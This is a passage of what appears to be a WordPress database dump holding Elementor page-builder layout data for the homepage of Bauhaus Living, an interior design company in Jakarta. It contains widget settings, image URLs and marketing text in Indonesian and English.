flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4164,4912,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4165,4912,'_elementor_pro_version','3.8.1'),(4166,4912,'_elementor_css','a:6:{s:4:\"time\";i:1695375026;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4167,4913,'_wp_page_template','elementor_header_footer'),(4168,4913,'_elementor_edit_mode','builder'),(4169,4913,'_elementor_template_type','wp-page'),(4170,4913,'_elementor_version','3.8.1'),(4171,4913,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\